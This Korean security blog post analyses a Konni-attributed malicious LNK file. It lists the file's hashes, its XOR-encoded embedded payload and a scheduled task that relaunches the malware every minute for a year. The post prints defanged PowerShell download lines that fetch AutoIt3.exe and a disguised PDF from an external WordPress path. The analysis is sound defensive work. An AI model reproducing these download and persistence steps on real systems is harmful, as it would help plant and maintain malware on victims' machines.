오늘은 북한 해킹 단체 코니(Konni)에서 만든 악성코드인 0a6934a3_.lnk 에 대해 분석을 해보겠습니다.
파일명:0a6934a3_.lnk
사이즈: 1 MB
MD5: 7b4fc4d03238d20938a8c1a763028237
SHA-1: 5fd6f20214f3fd1e424e453d2a5e5d78775b130e
SHA-256: 6afdbaf73028607b49f725467bf5dce4bb9f8c7b7095e43f09ecfce94b450fd4
악성코드 분석
1.LNK 내부의 오프셋 0x18A8~0xC1A71 바이트를 읽고 XOR 0x7F로 복호화
LNK 내부에 숨겨진 실행용 페이로드
2.파일 내부에서 페이로드 읽기
0x000018A8:6,312:LNK 내부 페이로드 시작 오프셋
0x000C1A71:793,201:읽어올 페이로드 크기
0x000C5C0E:809,998:대상 LNK 전체 크기
내부의 0x18A8 위치부터 0xC1A71 바이트를 읽어들임
3.XOR 복호화 방식
slSize가 0x01이므로 byRem 은 항상 0
3.복호화된 파일 저장명
$te8iducm 은 LNK 파일명 또는 경로
length - 5까지 자르고 보통 .lnk 확장자를 제거하는 목적
4.외부 파일 다운로드
hxxps://theboxflow(.)com/wp-admin/maint/thermometer/?TEd=melWM0' -OutFile 'AutoIt3(.)exe
hxxps://theboxflow(.)com/wp-admin/maint/thermometer/?YsG=tRnlL1' -OutFile 'pJtsLyQ(.)pdf
다운로드 위치
C:\Users\Public\Videos\
AutoIt3.exe
pJtsLyQ.pdf
5.예약 작업 지속성
시작 시점: 현재 시각+1분
반복 간격: 1분마다
반복 기간: 365일
실행 권한: 현재 사용자
RunLevel:Limited
LogonType:Interactive
작업명: pJtsLyQ
예약 작업이 등록 실행
Task Name:pJtsLyQ
Execute:C:\Users\Public\Videos\AutoIt3.exe
Argument:C:\Users\Public\Videos\pJtsLyQ.pdf
Interval:1분 마다
주기: 365일
일단 정확한 분석을 하려면 AutoIt3을 다운로드 해서 분석을 해야 하지만 해당 파일들은 사이트에서 제거되었기 때문에 더는 진행이 안 됩니다.
일단 어디를 노린 것인지 모르겠지만, 아무튼 매번 조심해서 기본 수식을 지키면서 사용을 하는 습관을 가져야 합니다.
'소프트웨어 팁 > 보안 및 분석' 카테고리의 다른 글
| 인스타그램 다이렉트 메시지 종단 간 암호화 기능 제거 메타가 채팅 내용에 접근 가능 (0) | 2026.05.13 |
|---|---|
| 인스타그램 DM 으로 유포 되는 네이버 계정 탈취 목적 김수키(Kimsuky)에서 만든 네이버 피싱 사이트 분석 (0) | 2026.05.11 |
| 북한 해킹 단체 김수키(Kimsuky)만든 악성코드-Condor_API-1.chm (0) | 2026.05.08 |
| 코레일(Korail) 4월 급여 명세서로 위장한 피싱 메일 분석 (0) | 2026.05.07 |
| Microsoft Edge(마이크로소프트 엣지)실행 시 모든 비밀번호를 메모리에 평문으로 저장 문제 발생 중 (0) | 2026.05.06 |
| Windows 11 KB5083769 업데이트 인해 백업 소프트웨어 오류 발생 (0) | 2026.05.05 |
| 정체를 알수 없는 APT 악성코드-NovaCX_Agency_Updated_2026047_091100_version_1_8.docx.lnk (0) | 2026.05.04 |
| 김수키(Kimsuky)에서 만든 악성코드-install.bat (0) | 2026.04.30 |
